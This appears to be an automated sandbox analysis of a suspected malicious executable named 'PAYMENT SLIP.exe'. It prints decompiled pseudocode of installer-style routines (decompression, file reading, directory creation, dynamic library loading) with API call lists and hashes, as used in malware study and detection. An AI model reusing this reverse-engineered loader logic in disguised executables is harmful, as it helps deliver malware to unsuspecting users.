              													__eflags =  *(__ebp - 0xc) - __edx;
              													if( *(__ebp - 0xc) >= __edx) {
              														__ecx = 0;
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              														__ecx = 1;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              														__ebx = 1;
              														__ecx =  *(__ebp - 0x48);
              														__ebx = 1 << __cl;
              														__ecx = 1 << __cl;
              														__ebx =  *(__ebp - 0x44);
              														__ebx =  *(__ebp - 0x44) | __ecx;
              														__cx = __ax;
              														__cx = __ax >> 5;
              														__eax = __eax - __ecx;
              														__edi = __edi + 1;
              														__eflags = __edi;
              														 *(__ebp - 0x44) = __ebx;
              														 *__esi = __ax;
              														 *(__ebp - 0x50) = __edi;
              													} else {
              														 *(__ebp - 0x10) = __edx;
              														0x800 = 0x800 - __ecx;
              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              														 *__esi = __dx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L111:
              														_t368 = __ebp - 0x48;
              														 *_t368 =  *(__ebp - 0x48) + 1;
              														__eflags =  *_t368;
              														goto L112;
              													} else {
              														goto L109;
              													}
              												}
              												__ecx =  *(__ebp - 0xc);
              												__ebx = __ebx + __ebx;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              													__ecx =  *(__ebp - 0x10);
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													__ebx = __ebx | 0x00000001;
              													__eflags = __ebx;
              													 *(__ebp - 0x44) = __ebx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													L101:
              													_t338 = __ebp - 0x48;
              													 *_t338 =  *(__ebp - 0x48) - 1;
              													__eflags =  *_t338;
              													goto L102;
              												} else {
              													goto L99;
              												}
              											}
              											__edx =  *(__ebp - 4);
              											__eax = __eax - __ebx;
              											 *(__ebp - 0x40) = __ecx;
              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              											goto L108;
              										case 0x1a:
              											L56:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												 *(__ebp - 0x88) = 0x1a;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x68);
              											__al =  *(__ebp - 0x5c);
              											__edx =  *(__ebp - 8);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              											 *( *(__ebp - 0x68)) = __al;
              											__ecx =  *(__ebp - 0x14);
              											 *(__ecx +  *(__ebp - 8)) = __al;
              											__eax = __ecx + 1;
              											__edx = 0;
              											_t192 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t192;
              											goto L79;
              										case 0x1b:
              											L75:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												 *(__ebp - 0x88) = 0x1b;
              												goto L170;
              											}
              											__eax =  *(__ebp - 0x14);
              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              											__eflags = __eax -  *(__ebp - 0x74);
              											if(__eax >=  *(__ebp - 0x74)) {
              												__eax = __eax +  *(__ebp - 0x74);
              												__eflags = __eax;
              											}
              											__edx =  *(__ebp - 8);
              											__cl =  *(__eax + __edx);
              											__eax =  *(__ebp - 0x14);
              											 *(__ebp - 0x5c) = __cl;
              											 *(__eax + __edx) = __cl;
              											__eax = __eax + 1;
              											__edx = 0;
              											_t274 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t274;
              											__eax =  *(__ebp - 0x68);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											_t283 = __ebp - 0x64;
              											 *_t283 =  *(__ebp - 0x64) - 1;
              											__eflags =  *_t283;
              											 *( *(__ebp - 0x68)) = __cl;
              											L79:
              											 *(__ebp - 0x14) = __edx;
              											goto L80;
              										case 0x1c:
              											while(1) {
              												L123:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													break;
              												}
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t414 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t414;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              												__eflags =  *(__ebp - 0x30);
              												 *( *(__ebp - 0x68)) = __cl;
              												 *(__ebp - 0x14) = _t414;
              												if( *(__ebp - 0x30) > 0) {
              													continue;
              												} else {
              													L80:
              													 *(__ebp - 0x88) = 2;
              													goto L1;
              												}
              											}
              											 *(__ebp - 0x88) = 0x1c;
              											goto L170;
              									}
              								}
              								L171:
              								_t535 = _t534 | 0xffffffff;
              								goto L172;
              							}
              						}
              					}
              				}
              			}














              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
              • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
              • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
              • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2ec9ba146dbbcc85aec9052d1e74b6de6d1b682aae0c5158e2a3c149b4d4a0d7
              • Instruction ID: 042bbab8b00641a0437b621fb8c438364d8116112d094145126b339cc0863bdf
              • Opcode Fuzzy Hash: 2ec9ba146dbbcc85aec9052d1e74b6de6d1b682aae0c5158e2a3c149b4d4a0d7
              • Instruction Fuzzy Hash: 9BF11E25A50398A9EB60CBE4EC55FFDB3B5AF48710F205497E60CEA190E7704AD0DB19
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 94%
              			E00403411(intOrPtr _a4) {
              				intOrPtr _t10;
              				intOrPtr _t11;
              				signed int _t12;
              				void* _t14;
              				void* _t15;
              				long _t16;
              				void* _t18;
              				intOrPtr _t19;
              				intOrPtr _t31;
              				long _t32;
              				intOrPtr _t34;
              				intOrPtr _t36;
              				void* _t37;
              				intOrPtr _t49;
              
              				_t32 =  *0x420ef4; // 0x3770f
              				_t34 = _t32 -  *0x40ce60 + _a4;
              				 *0x42a270 = GetTickCount() + 0x1f4;
              				if(_t34 <= 0) {
              					L22:
              					E00402FC6(1);
              					return 0;
              				}
              				E00403590( *0x420f04);
              				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
              				 *0x420f00 = _t34;
              				 *0x420ef0 = 0;
              				while(1) {
              					_t10 =  *0x420ef8; // 0x3f4d2
              					_t31 = 0x4000;
              					_t11 = _t10 -  *0x420f04;
              					if(_t11 <= 0x4000) {
              						_t31 = _t11;
              					}
              					_t12 = E0040357A(0x414ef0, _t31);
              					if(_t12 == 0) {
              						break;
              					}
              					 *0x420f04 =  *0x420f04 + _t31;
              					 *0x40ce80 = 0x414ef0;
              					 *0x40ce84 = _t31;
              					L6:
              					L6:
              					if( *0x42a274 != 0 &&  *0x42a320 == 0) {
              						_t19 =  *0x420f00; // 0x31437
              						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
              						E00402FC6(0);
              					}
              					 *0x40ce88 = 0x40cef0;
              					 *0x40ce8c = 0x8000; // executed
              					_t14 = E00406AAC(0x40ce68); // executed
              					if(_t14 < 0) {
              						goto L20;
              					}
              					_t36 =  *0x40ce88; // 0x40ff7b
              					_t37 = _t36 - 0x40cef0;
              					if(_t37 == 0) {
              						__eflags =  *0x40ce84; // 0x0
              						if(__eflags != 0) {
              							goto L20;
              						}
              						__eflags = _t31;
              						if(_t31 == 0) {
              							goto L20;
              						}
              						L16:
              						_t16 =  *0x420ef4; // 0x3770f
              						if(_t16 -  *0x40ce60 + _a4 > 0) {
              							continue;
              						}
              						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
              						goto L22;
              					}
              					_t18 = E004060E4( *0x40a01c, 0x40cef0, _t37); // executed
              					if(_t18 == 0) {
              						_push(0xfffffffe);
              						L21:
              						_pop(_t15);
              						return _t15;
              					}
              					 *0x40ce60 =  *0x40ce60 + _t37;
              					_t49 =  *0x40ce84; // 0x0
              					if(_t49 != 0) {
              						goto L6;
              					}
              					goto L16;
              					L20:
              					_push(0xfffffffd);
              					goto L21;
              				}
              				return _t12 | 0xffffffff;
              			}


















              APIs
              • GetTickCount.KERNEL32 ref: 00403425
                • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
              • SetFilePointer.KERNELBASE(0003770F,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: FilePointer$CountTick
              • String ID:
              • API String ID: 1092082344-0
              • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
              • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
              • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
              • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 60%
              			E004020D0(void* __ebx, void* __eflags) {
              				struct HINSTANCE__* _t23;
              				struct HINSTANCE__* _t31;
              				void* _t32;
              				WCHAR* _t35;
              				intOrPtr* _t36;
              				void* _t37;
              				void* _t39;
              
              				_t32 = __ebx;
              				asm("sbb eax, 0x42a338");
              				 *(_t39 - 4) = 1;
              				if(__eflags < 0) {
              					_push(0xffffffe7);
              					L15:
              					E00401423();
              					L16:
              					 *0x42a308 =  *0x42a308 +  *(_t39 - 4);
              					return 0;
              				}
              				_t35 = E00402D3E(0xfffffff0);
              				 *((intOrPtr*)(_t39 - 0x44)) = E00402D3E(1);
              				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
              					L3:
              					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
              					_t47 = _t23 - _t32;
              					 *(_t39 + 8) = _t23;
              					if(_t23 == _t32) {
              						_push(0xfffffff6);
              						goto L15;
              					}
              					L4:
              					_t36 = E004069A0(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
              					if(_t36 == _t32) {
              						E004055A4(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
              					} else {
              						 *(_t39 - 4) = _t32;
              						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
              							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
              						} else {
              							E00401423( *((intOrPtr*)(_t39 - 0x28)));
              							if( *_t36() != 0) {
              								 *(_t39 - 4) = 1;
              							}
              						}
              					}
              					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403BAB( *(_t39 + 8)) != 0) {
              						FreeLibrary( *(_t39 + 8));
              					}
              					goto L16;
              				}
              				_t31 = GetModuleHandleW(_t35); // executed
              				 *(_t39 + 8) = _t31;
              				if(_t31 != __ebx) {
              					goto L4;
              				}
              				goto L3;
              			}











              APIs
              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
              • String ID:
              • API String ID: 334405425-0
              • Opcode ID: 281a0d6ea35f89f6621ff779b54ca6ec35bae43d7113f061e7420eb1a16a743d
              • Instruction ID: f92bc13af20f738db02ac2fc0b39f0a9d6660206439d55b7b5299bd0a9e162c8
              • Opcode Fuzzy Hash: 281a0d6ea35f89f6621ff779b54ca6ec35bae43d7113f061e7420eb1a16a743d
              • Instruction Fuzzy Hash: 4521C671600204EBCF10AFA5CE48A9E7B70AF44358F70413BF511B91E1C7BD8E82966E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
              			E00403309(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
              				long _v8;
              				long _t21;
              				long _t22;
              				void* _t24;
              				long _t26;
              				int _t27;
              				long _t28;
              				void* _t30;
              				long _t31;
              				long _t32;
              				long _t36;
              
              				_t21 = _a4;
              				if(_t21 >= 0) {
              					_t32 = _t21 +  *0x42a2d8;
              					 *0x420ef4 = _t32;
              					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
              				}
              				_t22 = E00403411(4);
              				if(_t22 >= 0) {
              					_t24 = E004060B5( *0x40a01c,  &_a4, 4); // executed
              					if(_t24 == 0) {
              						L18:
              						_push(0xfffffffd);
              						goto L19;
              					} else {
              						 *0x420ef4 =  *0x420ef4 + 4;
              						_t36 = E00403411(_a4);
              						if(_t36 < 0) {
              							L21:
              							_t22 = _t36;
              						} else {
              							if(_a12 != 0) {
              								_t26 = _a4;
              								if(_t26 >= _a16) {
              									_t26 = _a16;
              								}
              								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
              								if(_t27 != 0) {
              									_t36 = _v8;
              									 *0x420ef4 =  *0x420ef4 + _t36;
              									goto L21;
              								} else {
              									goto L18;
              								}
              							} else {
              								if(_a4 <= 0) {
              									goto L21;
              								} else {
              									while(1) {
              										_t28 = _a4;
              										if(_a4 >= 0x4000) {
              											_t28 = 0x4000;
              										}
              										_v8 = _t28;
              										if(E004060B5( *0x40a01c, 0x414ef0, _t28) == 0) {
              											goto L18;
              										}
              										_t30 = E004060E4(_a8, 0x414ef0, _v8); // executed
              										if(_t30 == 0) {
              											_push(0xfffffffe);
              											L19:
              											_pop(_t22);
              										} else {
              											_t31 = _v8;
              											_a4 = _a4 - _t31;
              											 *0x420ef4 =  *0x420ef4 + _t31;
              											_t36 = _t36 + _t31;
              											if(_a4 > 0) {
              												continue;
              											} else {
              												goto L21;
              											}
              										}
              										goto L22;
              									}
              									goto L18;
              								}
              							}
              						}
              					}
              				}
              				L22:
              				return _t22;
              			}















              APIs
              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
              • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
              • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
              • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E004015C1(short __ebx, void* __eflags) {
              				void* _t17;
              				int _t23;
              				void* _t25;
              				signed char _t26;
              				short _t28;
              				short _t31;
              				short* _t34;
              				void* _t36;
              
              				_t28 = __ebx;
              				 *(_t36 + 8) = E00402D3E(0xfffffff0);
              				_t17 = E00405EBC(_t16);
              				_t32 = _t17;
              				if(_t17 != __ebx) {
              					do {
              						_t34 = E00405E3E(_t32, 0x5c);
              						_t31 =  *_t34;
              						 *_t34 = _t28;
              						if(_t31 != _t28) {
              							L5:
              							_t25 = E00405AF0( *(_t36 + 8));
              						} else {
              							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
              							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B0D(_t42) == 0) {
              								goto L5;
              							} else {
              								_t25 = E00405A73( *(_t36 + 8)); // executed
              							}
              						}
              						if(_t25 != _t28) {
              							if(_t25 != 0xb7) {
              								L9:
              								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
              							} else {
              								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
              								if((_t26 & 0x00000010) == 0) {
              									goto L9;
              								}
              							}
              						}
              						 *_t34 = _t31;
              						_t32 = _t34 + 2;
              					} while (_t31 != _t28);
              				}
              				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
              					_push(0xfffffff5);
              					E00401423();
              				} else {
              					E00401423(0xffffffe6);
              					E0040653C(0x436000,  *(_t36 + 8));
              					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
              					if(_t23 == 0) {
              						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
              					}
              				}
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t36 - 4));
              				return 0;
              			}












              APIs
                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                • Part of subcall function 00405A73: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
              • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID:
              • API String ID: 1892508949-0
              • Opcode ID: dcb730f39e3dd6a344b0b4a95f59667c82559ddfc9f43997ecf154a5f55b7a43
              • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
              • Opcode Fuzzy Hash: dcb730f39e3dd6a344b0b4a95f59667c82559ddfc9f43997ecf154a5f55b7a43
              • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E00401389(signed int _a4, struct HWND__* _a10) {
              				intOrPtr* _t6;
              				void* _t8;
              				void* _t10;
              				signed int _t11;
              				void* _t12;
              				signed int _t16;
              				signed int _t17;
              
              				_t17 = _a4;
              				while(_t17 >= 0) {
              					_t6 = _t17 * 0x1c +  *0x42a2b0;
              					if( *_t6 == 1) {
              						break;
              					}
              					_push(_t6); // executed
              					_t8 = E00401434(); // executed
              					if(_t8 == 0x7fffffff) {
              						return 0x7fffffff;
              					}
              					_t10 = E0040136D(_t8);
              					if(_t10 != 0) {
              						_t11 = _t10 - 1;
              						_t16 = _t17;
              						_t17 = _t11;
              						_t12 = _t11 - _t16;
              					} else {
              						_t12 = _t10 + 1;
              						_t17 = _t17 + 1;
              					}
              					if(_a10 != 0) {
              						 *0x42924c =  *0x42924c + _t12;
              						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
              					}
              				}
              				return 0;
              			}











              APIs
              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
              • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
              • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
              • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406931(signed int _a4) {
              				struct HINSTANCE__* _t5;
              				signed int _t10;
              
              				_t10 = _a4 << 3;
              				_t8 =  *(_t10 + 0x40a410);
              				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
              				if(_t5 != 0) {
              					L2:
              					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
              				}
              				_t5 = E004068C1(_t8); // executed
              				if(_t5 == 0) {
              					return 0;
              				}
              				goto L2;
              			}






              APIs
              • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
              • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                • Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
              • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
              • Opcode Fuzzy Hash: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
              • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E00406032(WCHAR* _a4, long _a8, long _a12) {
              				signed int _t5;
              				void* _t6;
              
              				_t5 = GetFileAttributesW(_a4); // executed
              				asm("sbb ecx, ecx");
              				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
              				return _t6;
              			}






              APIs
              • GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\PAYMENT SLIP.exe,80000000,00000003), ref: 00406036
              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0040600D(WCHAR* _a4) {
              				signed char _t3;
              				signed char _t7;
              
              				_t3 = GetFileAttributesW(_a4); // executed
              				_t7 = _t3;
              				if(_t7 != 0xffffffff) {
              					SetFileAttributesW(_a4, _t3 & 0x000000fe);
              				}
              				return _t7;
              			}






              APIs
              • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405AF0(WCHAR* _a4) {
              				int _t2;
              
              				_t2 = CreateDirectoryW(_a4, 0); // executed
              				if(_t2 == 0) {
              					return GetLastError();
              				}
              				return 0;
              			}

              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
